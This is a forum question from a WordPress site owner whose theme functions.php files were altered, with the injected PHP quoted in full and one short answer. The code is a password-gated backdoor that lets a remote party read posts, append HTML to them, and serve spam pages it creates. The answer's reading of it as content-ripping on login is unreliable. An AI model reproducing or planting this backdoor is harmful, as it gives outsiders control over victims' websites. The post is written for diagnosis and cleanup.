# Want to know the reason that the functions.php of WordPress theme was hacked

Tags: wordpress

Seniors.

I found all the WordPress themes on my server were hacked. The functions.php was automatic modified and the following codes was added into the functions.php, what is that? Is there any way to find out the bug? Thanks

```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f1d2299e....fe9f82032985c905'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?>
```

Answer (score 0):

It looks like it's rewriting all content on every page of your site, but only when someone logs in with the password it references.

Then it injects html tags into the page content.

Why? I would suggest this is so that they can rip content from your site by looking for the new markup and grabbing the html within those tags. Specifically they seem to be trying to get lists of all the links on your pages.